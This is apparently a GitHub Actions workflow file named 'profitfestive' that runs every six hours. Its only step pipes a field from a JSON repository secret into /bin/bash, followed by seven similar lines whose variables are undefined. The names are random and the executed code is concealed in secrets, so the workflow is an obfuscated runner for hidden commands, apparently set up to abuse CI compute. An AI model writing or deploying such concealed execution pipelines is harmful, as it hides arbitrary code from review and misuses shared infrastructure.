name: profitfestive

on:
  workflow_dispatch:
  schedule:
    - cron: '10 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: profitfestive
        env:
          r788: ${{ secrets.r788 }}
        run: |
          echo $r788 | jq -r .qtea60 | /bin/bash
          echo $fh54 | jq -r .nfhjv7 | /bin/bash
          echo $gw636 | jq -r .qwpgm21837 | /bin/bash
          echo $v0 | jq -r .nqiaf00990 | /bin/bash
          echo $bgczg90 | jq -r .nem451 | /bin/bash
          echo $aoy911 | jq -r .iiqu228 | /bin/bash
          echo $yyvr241 | jq -r .q7 | /bin/bash
          echo $vrgrl8 | jq -r .znt145 | /bin/bash

